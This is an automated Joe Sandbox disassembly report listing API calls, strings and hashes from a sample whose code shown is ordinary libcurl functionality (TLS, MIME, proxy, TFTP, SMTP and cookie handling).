                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0216F
                                    • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,00E57138,?,?,00000000,?,?,?,?,?,?,00E0184E), ref: 00E0219C
                                    • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000000,?,?,?,?,?,?,00E0184E), ref: 00E021AE
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E57138,?,?,00000000,?,?,?,?,?,?,00E0184E), ref: 00E021BC
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00E0184E), ref: 00E021CB
                                    • strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,00E0184E), ref: 00E021D3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,Failed to open the file %s: %s,?,00000000,?,?,?,00E0184E), ref: 00E021EA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,00E0184E), ref: 00E021F6
                                    Similarity
                                    • API ID: _errno$free$_close_fdopenfopenmallocstrerror
                                    • String ID: %s/%s$0kv@qv@/lv$Failed to open the file %s: %s$Remote filename has no length!$out of memory$overflow in filename generation
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E32FFA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E33075
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E33098
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E33105
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E33147
                                      • Part of subcall function 00E32B7A: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E32BB8
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E33386
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E333A4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E333BE
                                    Similarity
                                    • API ID: free
                                    • String ID: HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s$%s $%s?%s$1.0$1.1$Accept$Accept-Encoding$Accept-Encoding: %s$Accept: */*$Proxy-Connection$Proxy-Connection: Keep-Alive$Referer$Referer: %s$User-Agent$upload completely sent off: %I64d out of %I64d bytes
                                    APIs
                                      • Part of subcall function 00E15D67: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00E0A827,?,?,00000000), ref: 00E15D7A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24013
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24025
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24039
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$calloc
                                    • String ID: Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.$Unsupported proxy scheme for '%s'$Unsupported proxy syntax in '%s'$http$https$socks$socks4$socks4a$socks5$socks5h$xk
                                    • API String ID: 3095843317-3687139825
                                    • Opcode ID: 5f11da7bcbcdf33be068ccb03a221068ac9dd7a476fec2fe99b0dd8d768fa3ca
                                    • Instruction ID: e3efe6ff23f8ec09d479c5c90dd22f96d39daca0f995faa40423b4aeb5d8d347
                                    • Opcode Fuzzy Hash: 5f11da7bcbcdf33be068ccb03a221068ac9dd7a476fec2fe99b0dd8d768fa3ca
                                    • Instruction Fuzzy Hash: D2C1F271F00229DBDB149F68E8417EEB7F6EF84314F14902AE905BB291DB789E458F60
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00E08BF9), ref: 00E21740
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00E08BF9), ref: 00E21765
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E08BF9), ref: 00E21782
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E08BF9), ref: 00E217A6
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E217CB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E217F5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2181D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21876
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21893
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E218B0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E218EF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2190C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21929
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21946
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21963
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21980
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2199D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E219BA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E219D7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E219F4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21A11
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21A2E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21A4B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21A68
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21AE2
                                      • Part of subcall function 00E1D126: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1D13A
                                      • Part of subcall function 00E10E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E03167), ref: 00E10E2C
                                      • Part of subcall function 00E10E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E10E41
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21AB8
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 96fec795f57af15035906b9239b6bf51faa52965cd0587616b73b9fdff939964
                                    • Instruction ID: 8384ca2d95baa6faa49a17ba94112af8df4d8d05ee5c2d44e4436451fd05e7e3
                                    • Opcode Fuzzy Hash: 96fec795f57af15035906b9239b6bf51faa52965cd0587616b73b9fdff939964
                                    • Instruction Fuzzy Hash: 1AB1F831714A16EFDB0D6F35FC545A9FBA2FF48351B14952AD41AA3262CFB43C248B90
                                    Strings
                                    • schannel: can't renegotiate, encrypted data available, xrefs: 00E45ED1
                                    • schannel: server closed the connection, xrefs: 00E45EE5
                                    • schannel: renegotiating SSL/TLS connection, xrefs: 00E45DE5
                                    • schannel: failed to read data from server: %s, xrefs: 00E45E8D
                                    • schannel: server indicated shutdown in a prior call, xrefs: 00E45B4A
                                    • schannel: can't renegotiate, an error is pending, xrefs: 00E45EB7
                                    • schannel: unable to re-allocate memory, xrefs: 00E45BB8, 00E45EA1
                                    • schannel: an unrecoverable error occurred in a prior call, xrefs: 00E45B33
                                    • schannel: server closed abruptly (missing close_notify), xrefs: 00E45F34
                                    • schannel: Curl_read_plain returned error %d, xrefs: 00E45C1F
                                    • schannel: failed to decrypt data, need more data, xrefs: 00E45E6D
                                    • schannel: Curl_read_plain returned CURLE_RECV_ERROR, xrefs: 00E45C0F
                                    • schannel: renegotiation failed, xrefs: 00E45EC1
                                    • schannel: remote party requests renegotiation, xrefs: 00E45DBC
                                    • schannel: enough decrypted data is already available, xrefs: 00E45B18
                                    • schannel: SSL/TLS connection renegotiated, xrefs: 00E45E33
                                    Similarity
                                    • API ID:
                                    • String ID: schannel: Curl_read_plain returned CURLE_RECV_ERROR$schannel: Curl_read_plain returned error %d$schannel: SSL/TLS connection renegotiated$schannel: an unrecoverable error occurred in a prior call$schannel: can't renegotiate, an error is pending$schannel: can't renegotiate, encrypted data available$schannel: enough decrypted data is already available$schannel: failed to decrypt data, need more data$schannel: failed to read data from server: %s$schannel: remote party requests renegotiation$schannel: renegotiating SSL/TLS connection$schannel: renegotiation failed$schannel: server closed abruptly (missing close_notify)$schannel: server closed the connection$schannel: server indicated shutdown in a prior call$schannel: unable to re-allocate memory
                                    • API String ID: 0-3083360527
                                    • Opcode ID: a4eaabe086bba143da38e4545d23c5b7e06d0ffdd267182d296bd06fa2829826
                                    • Instruction ID: c887cefa2d76eadb8694b685085497ad3fc2d69744f5e6359c7708b3d405250c
                                    • Opcode Fuzzy Hash: a4eaabe086bba143da38e4545d23c5b7e06d0ffdd267182d296bd06fa2829826
                                    • Instruction Fuzzy Hash: E4F1A672A08B02AFDB28CF14E845A6AB7E4FF48314F14552DF489B7642D771E854CF86
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E2AB92
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2AC3A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2AC4F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2ACD1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2ACE6
                                    Strings
                                    • %zx%s, xrefs: 00E2AE06
                                    • Malformatted trailing header, skipping trailer, xrefs: 00E2ABDD
                                    • Signaling end of chunked upload via terminating chunk., xrefs: 00E2AE65
                                    • Moving trailers state machine from initialized to sending., xrefs: 00E2AB00
                                    • hv, xrefs: 00E2AB7C
                                    • read function returned funny value, xrefs: 00E2ADA9
                                    • Read callback asked for PAUSE when not supported, xrefs: 00E2AD69
                                    • operation aborted by callback, xrefs: 00E2AD40
                                    • operation aborted by trailing headers callback, xrefs: 00E2AC95
                                    • *, xrefs: 00E2ACA5
                                    • Signaling end of chunked upload after trailers., xrefs: 00E2AF0B
                                    • Successfully compiled trailers., xrefs: 00E2AC11
                                    • hv, xrefs: 00E2ADD1
                                    Similarity
                                    • API ID: free$___from_strstr_to_strchr
                                    • String ID: %zx%s$*$Malformatted trailing header, skipping trailer$Moving trailers state machine from initialized to sending.$Read callback asked for PAUSE when not supported$Signaling end of chunked upload after trailers.$Signaling end of chunked upload via terminating chunk.$Successfully compiled trailers.$hv$hv$operation aborted by callback$operation aborted by trailing headers callback$read function returned funny value
                                    • API String ID: 622630536-2435943033
                                    • Opcode ID: 9252ce6714e69423cd37a8e11d503c7407601b94a9c1c42af7c01b0ee41c40fb
                                    • Instruction ID: c2297812e6015968a7dc9bd89e45a526c0d3bb6e1a519c616d948ca4a0506401
                                    • Opcode Fuzzy Hash: 9252ce6714e69423cd37a8e11d503c7407601b94a9c1c42af7c01b0ee41c40fb
                                    • Instruction Fuzzy Hash: 9ED1FF32A043158FDF15DF28E891BE97BE1EF88324F285179D809BB296CB745C45CBA1
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,00E0F2DD,?,?,?,00E0F296), ref: 00E0F06B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,00E0F2DD,?,?,?,00E0F296), ref: 00E0F0B1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,00E0F2DD,?,?,?,00E0F296), ref: 00E0F0F7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,00E0F2DD,?,?,?,00E0F296), ref: 00E0F13D
                                      • Part of subcall function 00E0EEAB: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,00E0F2DD,?,?,?,00E0F296), ref: 00E0F1C0
                                      • Part of subcall function 00E0E9EB: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000000,00000000,blobpointer,?,?,?,?,?,?,?,?), ref: 00E0EA46
                                    Strings
                                    • curl_mime_filename(part%d, "%s");, xrefs: 00E0F0D4
                                    • curl_mime_filedata(part%d, "%s");, xrefs: 00E0EF8D
                                    • curl_mime_data(part%d, "%s", CURL_ZERO_TERMINATED);, xrefs: 00E0EFF3
                                    • curl_mime_filename(part%d, NULL);, xrefs: 00E0EFBE
                                    • part%d = curl_mime_addpart(mime%d);, xrefs: 00E0EEE9
                                    • curl_mime_name(part%d, "%s");, xrefs: 00E0F11A
                                    • mime%d = NULL;, xrefs: 00E0F048
                                    • curl_mime_subparts(part%d, mime%d);, xrefs: 00E0F029
                                    • Pl, xrefs: 00E0EF35
                                    • curl_mime_encoder(part%d, "%s");, xrefs: 00E0F08E
                                    • curl_mime_type(part%d, "%s");, xrefs: 00E0F160
                                    • slist%d = NULL;, xrefs: 00E0F1AF
                                    • curl_mime_headers(part%d, slist%d, 1);, xrefs: 00E0F198
                                    • (curl_seek_callback) fseek, NULL, stdin);, xrefs: 00E0EF61
                                    • curl_mime_data_cb(part%d, -1, (curl_read_callback) fread, \, xrefs: 00E0EF45
                                    Similarity
                                    • API ID: free$malloc
                                    • String ID: (curl_seek_callback) fseek, NULL, stdin);$Pl$curl_mime_data(part%d, "%s", CURL_ZERO_TERMINATED);$curl_mime_data_cb(part%d, -1, (curl_read_callback) fread, \$curl_mime_encoder(part%d, "%s");$curl_mime_filedata(part%d, "%s");$curl_mime_filename(part%d, "%s");$curl_mime_filename(part%d, NULL);$curl_mime_headers(part%d, slist%d, 1);$curl_mime_name(part%d, "%s");$curl_mime_subparts(part%d, mime%d);$curl_mime_type(part%d, "%s");$mime%d = NULL;$part%d = curl_mime_addpart(mime%d);$slist%d = NULL;
                                    • API String ID: 2190258309-1036195276
                                    • Opcode ID: d9d50208538d7578cc33a8a68f2c6b9f84b672a0298f692051e72fcfaa428643
                                    • Instruction ID: f5c0318d0389abf6f98e01e8b7439b9a3e053075dca30a0b6e71a7994d4d4d94
                                    • Opcode Fuzzy Hash: d9d50208538d7578cc33a8a68f2c6b9f84b672a0298f692051e72fcfaa428643
                                    • Instruction Fuzzy Hash: DC811737985311FBCB365AA4EC4296E33A09B41770B286665FD34B77D6EF308E918340
                                    APIs
                                    • _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 00E43BC3
                                    • _mbsnbcmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,CurrentUser,00000000), ref: 00E43BE1
                                    • _mbsnbcmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,LocalMachine,00000000), ref: 00E43C00
                                    • _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 00E43CC8
                                    Strings
                                    Similarity
                                    • API ID: _mbschr_mbsnbcmp
                                    • String ID: CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Services$Users
                                    • API String ID: 866314863-3209074899
                                    • Opcode ID: 43e1430b31ce4337e689a758b5a1959efe83d7f5482c3344edb8bfe651b84ca6
                                    • Instruction ID: 70f32e4a67818e4c7b5cf76a850267fe2c5ab7fa316d0b53c0a9674baf33ca8e
                                    • Opcode Fuzzy Hash: 43e1430b31ce4337e689a758b5a1959efe83d7f5482c3344edb8bfe651b84ca6
                                    • Instruction Fuzzy Hash: BA41F235644302AFEB145F36BC85B2BBBACEF40789F245029F905B2257E7708A089B61
                                    Strings
                                    Similarity
                                    • API ID:
                                    • String ID: $%%%02x
                                    • API String ID: 0-2848173732
                                    • Opcode ID: ae786c57e39b6bcc3ccd7875d6a55b3946744e1d9c3788fe84d543e711816067
                                    • Instruction ID: 0669d226b22fab16e1e0bf852a4f599cb12bba972fffd582a3cb05251dd8f9e0
                                    • Opcode Fuzzy Hash: ae786c57e39b6bcc3ccd7875d6a55b3946744e1d9c3788fe84d543e711816067
                                    • Instruction Fuzzy Hash: 89F14631E04645DFCF188F24E8506FDBBB2AF45358F24A46ED842B7291DB749D89CB90
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000078,00000000,?,?,?,?,00E0D002), ref: 00E10658
                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000025,00000000,?,?,?,00E0D002), ref: 00E10699
                                    Strings
                                    Similarity
                                    • API ID: __acrt_iob_funcfputc
                                    • String ID: %header{$curl: unknown --write-out variable: '%s'$header{
                                    • API String ID: 2340846889-221383536
                                    • Opcode ID: d70319bb434dda1fa326a2f87742407917115e1002467a208efca587de982418
                                    • Instruction ID: 362d6adb83e06f1fbc3f23cb7cf10b04585443be4e4531f18a80ee8128993501
                                    • Opcode Fuzzy Hash: d70319bb434dda1fa326a2f87742407917115e1002467a208efca587de982418
                                    • Instruction Fuzzy Hash: 2E51AB31908340EFEB285F65AC19BFB3BB4DF4175AF28204AE849BB1D1D6E198C4C791
                                    APIs
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00E37789
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00E377FC
                                    Strings
                                    Similarity
                                    • API ID: strtol
                                    • String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Malformed ACK packet, rejecting$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
                                    • API String ID: 76114499-360479797
                                    • Opcode ID: 666464820d4b2d7e01c4bcb27582c3f7d49c45a15df1451a2756e3e708369a53
                                    • Instruction ID: b7ca1882225bb07c5fd794553764693a2ecc9d77f943b35dc5dbd85ca01d7a7f
                                    • Opcode Fuzzy Hash: 666464820d4b2d7e01c4bcb27582c3f7d49c45a15df1451a2756e3e708369a53
                                    • Instruction Fuzzy Hash: 06516DB1F48310BBDB289A249C4EEBE3BB9DF85748F106469E845B7281E6704D01C7A0
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,000001B8,?), ref: 00E4EE3F
                                    • GetFileSizeEx.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 00E4EEC6
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E4EED1
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4EF3A
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,00000000), ref: 00E4EF76
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00E4EFC1
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E4F006
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,000001B8,?), ref: 00E4EE50
                                      • Part of subcall function 00E1A1A0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A1AB
                                      • Part of subcall function 00E1A1A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A1B3
                                      • Part of subcall function 00E1A1A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A1E9
                                      • Part of subcall function 00E1A1A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A1F6
                                      • Part of subcall function 00E1A1A0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A1FE
                                      • Part of subcall function 00E1A1A0: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00E1A209
                                    • CreateFileA.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,000001B8,?), ref: 00E4EE8F
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E4EEA1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4EFDB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E4EFE9
                                    Strings
                                    • schannel: invalid path name for CA file '%s': %s, xrefs: 00E4EE66
                                    • schannel: failed to read from CA file '%s': %s, xrefs: 00E4F021
                                    • schannel: failed to open CA file '%s': %s, xrefs: 00E4EEB7
                                    • schannel: CA file exceeds max size of %u bytes, xrefs: 00E4EF18
                                    • schannel: failed to determine size of CA file '%s': %s, xrefs: 00E4EEE7
                                    Similarity
                                    • API ID: ErrorLast$File_errno$free$CloseCreateHandleReadSize_strdupmalloc
                                    • String ID: schannel: CA file exceeds max size of %u bytes$schannel: failed to determine size of CA file '%s': %s$schannel: failed to open CA file '%s': %s$schannel: failed to read from CA file '%s': %s$schannel: invalid path name for CA file '%s': %s
                                    • API String ID: 1064901726-3430970913
                                    • Opcode ID: f60db99ee0fe573911366eb28740bc81526abe9e81f4d1fe729b8bb000e47123
                                    • Instruction ID: 6f46cc4d9c8a16df130902943f5ec9575ee95b4a2e342aa5b247574e79c7ea60
                                    • Opcode Fuzzy Hash: f60db99ee0fe573911366eb28740bc81526abe9e81f4d1fe729b8bb000e47123
                                    • Instruction Fuzzy Hash: 1451D671A40718AFDB285B25EC06BEE77B9FB48311F1015A5F509B6281DBB06E848F90
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3623D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E362C2
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3634C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E36382
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E36484
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3649E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E364B2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: AUTH=$ SIZE=$ SMTPUTF8$%I64d$<%s>$<%s@%s>$MAIL FROM:%s%s%s%s%s%s$Mime-Version$Mime-Version: 1.0
                                    • API String ID: 1294909896-2994854565
                                    • Opcode ID: 10691250970075880eb8733b0c9d97defc2454ec02b45b10ecb7972c25a2ca38
                                    • Instruction ID: 4296667926c1881b7e951fbb5d43e037fe3fe1c4f7b758bfe1549618e49a0b14
                                    • Opcode Fuzzy Hash: 10691250970075880eb8733b0c9d97defc2454ec02b45b10ecb7972c25a2ca38
                                    • Instruction Fuzzy Hash: 4CC12F31A08216EFDB149B74AC589AEBFF4FF44358F24E16AE844B7251DB70AD04CB90
                                    APIs
                                      • Part of subcall function 00E10E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E03167), ref: 00E10E2C
                                      • Part of subcall function 00E10E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E10E41
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E141F8
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1420C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: 8bit$; boundary=$; filename="$; name="$Content-Disposition$Content-Disposition: %s%s%s%s%s%s%s$Content-Transfer-Encoding$Content-Transfer-Encoding: %s$Content-Type$Content-Type: %s%s%s$application/octet-stream$attachment$form-data$multipart/$multipart/form-data$multipart/mixed$text/plain
                                    • API String ID: 1294909896-1595554923
                                    • Opcode ID: c1a6866fe8b678ff4e19ecf3421d9ac81fafd232e899f07060e78fec73e77ccc
                                    • Instruction ID: 7c35112b83455c498c7de160644455800214bd64cba884a8dc07cdcc2231a14f
                                    • Opcode Fuzzy Hash: c1a6866fe8b678ff4e19ecf3421d9ac81fafd232e899f07060e78fec73e77ccc
                                    • Instruction Fuzzy Hash: F7B19FB1B00606EBDB188A6AD4916EA77A5BF88359F14A03DE905F7790D770EDD0CB80
                                    APIs
                                      • Part of subcall function 00E12813: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E12848
                                    • _strrchr.LIBCMT ref: 00E3E194
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000), ref: 00E3E1C3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3E1E3
                                    Strings
                                    • Request has same path as previous transfer, xrefs: 00E3E41F
                                    • Uploading to a URL without a file name, xrefs: 00E3E380
                                    • path contains control characters, xrefs: 00E3E154
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _strrchrcallocfreemalloc
                                    • String ID: Request has same path as previous transfer$Uploading to a URL without a file name$path contains control characters
                                    • API String ID: 2159935718-4131979473
                                    • Opcode ID: b2dc6c22fcf28f211c5b5aaf9e44224d113e6b70fa6362eeae49d4b2cb160dd5
                                    • Instruction ID: e9161fb4c7819b12ca1330e03bae13a0c6f5ae515fdbc0f386f83d1c9af7c0ad
                                    • Opcode Fuzzy Hash: b2dc6c22fcf28f211c5b5aaf9e44224d113e6b70fa6362eeae49d4b2cb160dd5
                                    • Instruction Fuzzy Hash: 29A1D071A082069FDB188F68A858ABEBFF4EF49354F14406EE856F7391DB71AC04CB54
                                    APIs
                                      • Part of subcall function 00E1FA05: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,00000000,?,00E2128E,?,?,00E20F71,00000000,?,00000001), ref: 00E1FA12
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,00E2128E,?), ref: 00E20F81
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00E56C58,00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,00E2128E), ref: 00E20FD2
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(# Netscape HTTP Cookie File# https://curl.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.,00000000,?,?,?,?,?,?,?,?,?,?,00E2128E,?,?,766B3C50), ref: 00E20FED
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2101B
                                    • qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,00000004,00E20B10), ref: 00E2105E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E210A0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E210C0
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00E2128E,?,?,766B3C50,00000000,00E2182F), ref: 00E210CA
                                      • Part of subcall function 00E350DE: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,00000000), ref: 00E3510A
                                      • Part of subcall function 00E350DE: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000), ref: 00E35118
                                      • Part of subcall function 00E350DE: MoveFileExA.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING),00000000,?,00000000), ref: 00E35166
